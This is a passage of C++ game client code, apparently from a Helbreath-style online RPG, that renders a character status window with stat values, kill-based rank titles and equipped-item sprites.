	PutAlignedString(sX + 180, sX + 250, sY + 134 - 7, G_cTxt, 45, 25, 25);

	// Hp
	iTemp = m_iHP;
	wsprintf(G_cTxt, "%d/%d", iTemp, m_iVit * 3 + (m_iLevel + m_iMajesticLevel) * 2 + (m_iStr + m_iAngelicStr) / 2);
	PutAlignedString(sX + 180, sX + 250, sY + 148 - 9, G_cTxt, 45, 25, 25);

	// Mp
	iTemp = m_iMP;
	wsprintf(G_cTxt, "%d/%d", iTemp, ((m_iMag + m_iAngelicMag) * 2) + (m_iLevel + m_iMajesticLevel) * 2 + (m_iInt + m_iAngelicInt) / 2);
	PutAlignedString(sX + 180, sX + 250, sY + 161 - 9, G_cTxt, 45, 25, 25);

	// Sp
	iTemp = m_iSP;
	wsprintf(G_cTxt, "%d/%d", iTemp, (m_iLevel + m_iMajesticLevel) * 2 + (m_iStr + m_iAngelicStr) * 2);
	PutAlignedString(sX + 180, sX + 250, sY + 175 - 11, G_cTxt, 45, 25, 25);

	// Max.Load
	wsprintf(G_cTxt, "%d/%d", (_iCalcTotalWeight() / 100), (((m_iStr + m_iAngelicStr) * 5) + (m_iLevel + m_iMajesticLevel) * 5));
	PutAlignedString(sX + 180, sX + 250, sY + 189 - 12, G_cTxt, 45, 25, 25);

	// Enemy Kills
	// centu - muestra el maximo total de eks
	wsprintf(G_cTxt, "%d/%d", m_iEnemyKillCount, m_iMaxEK);
	PutAlignedString(sX + 198, sX + 250, sY + 203 - 13, G_cTxt, 45, 25, 25);

	// Majestic Points
	wsprintf(G_cTxt, "%d", m_iGizonItemUpgradeLeft);
	PutAlignedString(sX + 198, sX + 250, sY + 230 - 14, G_cTxt, 45, 25, 25);

	// Deaths
	wsprintf(G_cTxt, "%d", m_iPlayerDeaths);
	PutAlignedString(sX + 198, sX + 250, sY + 257 - 15, G_cTxt, 45, 25, 25);

	// REP
	wsprintf(G_cTxt, "%d", m_iRating);
	PutAlignedString(sX + 198, sX + 250, sY + 244 - 15, G_cTxt, 45, 25, 25);

	// DeathMach Points
	wsprintf(G_cTxt, "%d", m_iPlayerDGPoints);
	PutAlignedString(sX + 198, sX + 250, sY + 216 - 13, G_cTxt, 45, 25, 25);

	//MORLA 2.2 - Determina el rango del pj
	if ((m_iMaxEK >= 100) && (m_iRating >= 20))
	{
		if (((m_iMaxEK >= 100) && (m_iRating < 30)) || ((m_iMaxEK < 200) && (m_iRating >= 20)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK1);
		}
		else if (((m_iMaxEK >= 200) && (m_iRating < 40)) || ((m_iMaxEK < 300) && (m_iRating >= 30)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK2);
		}
		else if (((m_iMaxEK >= 300) && (m_iRating < 50)) || ((m_iMaxEK < 400) && (m_iRating >= 40)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK3);
		}
		else if (((m_iMaxEK >= 400) && (m_iRating < 60)) || ((m_iMaxEK < 500) && (m_iRating >= 50)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK4);
		}
		else if (((m_iMaxEK >= 500) && (m_iRating < 70)) || ((m_iMaxEK < 600) && (m_iRating >= 60)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK5);
		}
		else if (((m_iMaxEK >= 600) && (m_iRating < 80)) || ((m_iMaxEK < 700) && (m_iRating >= 70)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK6);
		}
		else if (((m_iMaxEK >= 700) && (m_iRating < 90)) || ((m_iMaxEK < 800) && (m_iRating >= 80)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK7);
		}
		else if (((m_iMaxEK >= 800) && (m_iRating < 100)) || ((m_iMaxEK < 900) && (m_iRating >= 90)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK8);
		}
		else if (((m_iMaxEK >= 900) && (m_iRating < 200)) || ((m_iMaxEK < 1000) && (m_iRating >= 100)))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK9);
		}
		else if ((m_iMaxEK >= 1000) && (m_iRating >= 200))
		{
			strcpy(G_cTxt, DEF_MSG_RANGOEK10);
		}
		PutAlignedString(sX + 121, sX + 250, sY + 216 + 39, G_cTxt, 255, 255, 0);
	}
	else
	{
		strcpy(G_cTxt, "Common Player");
		PutAlignedString(sX + 121, sX + 250, sY + 216 + 39, G_cTxt, 45, 25, 25);
	}

	// Str
	if (m_iAngelicStr == 0)
	{
		wsprintf(G_cTxt, "%d", m_iStr);
		PutAlignedString(sX + 48 + 2, sX + 82, sY + 285 - 2, G_cTxt, 45, 25, 25);
	}
	else
	{
		wsprintf(G_cTxt, "%d", m_iStr + m_iAngelicStr);
		PutAlignedString(sX + 48 + 2, sX + 82, sY + 285 - 2, G_cTxt, 0, 0, 192);
	}

	// Vit
	wsprintf(G_cTxt, "%d", m_iVit);
	PutAlignedString(sX + 218, sX + 251, sY + 285 - 2, G_cTxt, 45, 25, 25);

	// Dex
	if (m_iAngelicDex == 0)
	{
		wsprintf(G_cTxt, "%d", m_iDex);
		PutAlignedString(sX + 48 + 2, sX + 82, sY + 302 - 2, G_cTxt, 45, 25, 25);
	}
	else
	{
		wsprintf(G_cTxt, "%d", m_iDex + m_iAngelicDex);
		PutAlignedString(sX + 48 + 2, sX + 82, sY + 302 - 2, G_cTxt, 0, 0, 192);
	}

	// Int
	if (m_iAngelicInt == 0)
	{
		wsprintf(G_cTxt, "%d", m_iInt);
		PutAlignedString(sX + 135, sX + 167, sY + 285 - 2, G_cTxt, 45, 25, 25);
	}
	else
	{
		wsprintf(G_cTxt, "%d", m_iInt + m_iAngelicInt);
		PutAlignedString(sX + 135, sX + 167, sY + 285 - 2, G_cTxt, 0, 0, 192);
	}

	// Mag
	if (m_iAngelicMag == 0)
	{
		wsprintf(G_cTxt, "%d", m_iMag);
		PutAlignedString(sX + 135, sX + 167, sY + 302 - 2, G_cTxt, 45, 25, 25);
	}
	else
	{
		wsprintf(G_cTxt, "%d", m_iMag + m_iAngelicMag);
		PutAlignedString(sX + 135, sX + 167, sY + 302 - 2, G_cTxt, 0, 0, 192);
	}

	// Chr
	wsprintf(G_cTxt, "%d", m_iCharisma);
	PutAlignedString(sX + 218, sX + 251, sY + 302 - 2, G_cTxt, 45, 25, 25);

	for (i = 0; i < DEF_MAXITEMEQUIPPOS; i++)
		cEquipPoiStatus[i] = -1;

	for (i = 0; i < DEF_MAXITEMS; i++)
	{
		if ((m_pItemList[i] != NULL) && (m_bIsItemEquipped[i] == TRUE))	cEquipPoiStatus[m_pItemList[i]->m_cEquipPos] = i;
	}
	if ((m_sPlayerType >= 1) && (m_sPlayerType <= 3))
	{
		cCollison = -1;
		m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 0]->PutSpriteFast(sX + 171, sY + 290, m_sPlayerType - 1, m_dwCurTime);
		if (cEquipPoiStatus[DEF_EQUIPPOS_HEAD] == -1)
		{
			_GetHairColorRGB(((m_sPlayerAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
			m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 18]->PutSpriteRGB(sX + 171, sY + 290, (m_sPlayerAppr1 & 0x0F00) >> 8, iR, iG, iB, m_dwCurTime);
		}

		m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 19]->PutSpriteFast(sX + 171, sY + 290, (m_sPlayerAppr1 & 0x000F), m_dwCurTime);

		if (cEquipPoiStatus[DEF_EQUIPPOS_BACK] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_BACK]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 41, sY + 137, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 41, sY + 137, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 41, sY + 137, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 41, sY + 137, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 41, sY + 137, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_BACK;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_PANTS] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_PANTS;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_ARMS] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_ARMS;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_BOOTS] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_BOOTS;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_BODY] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_BODY]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_BODY;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_FULLBODY;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_LHAND] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 90, sY + 170, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 90, sY + 170, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 90, sY + 170, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 90, sY + 170, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 90, sY + 170, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_LHAND;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_RHAND] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 57, sY + 186, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 57, sY + 186, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 57, sY + 186, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 57, sY + 186, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 57, sY + 186, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_RHAND;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 57, sY + 186, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 57, sY + 186, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 57, sY + 186, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 57, sY + 186, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 57, sY + 186, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_TWOHAND;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_NECK] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_NECK]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 35, sY + 120, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 35, sY + 120, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 35, sY + 120, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 35, sY + 120, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 35, sY + 120, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_NECK;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_RFINGER] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 32, sY + 193, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 32, sY + 193, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 32, sY + 193, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 32, sY + 193, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 32, sY + 193, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_RFINGER;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_LFINGER] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 90, sY + 175, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 90, sY + 175, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 90, sY + 175, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 90, sY + 175, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 90, sY + 175, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_LFINGER;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_HEAD] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteFast(sX + 72, sY + 135, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutSpriteRGB(sX + 72, sY + 135, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite2(sX + 72, sY + 135, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSpriteRGB(sX + 72, sY + 135, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 72, sY + 135, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_HEAD;
		}
		if (cCollison != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[cCollison]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[cCollison]]->m_sSpriteFrame;
			if (cCollison == DEF_EQUIPPOS_HEAD)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 72, sY + 135, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_RFINGER)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 32, sY + 193, sFrame, m_dwCurTime);
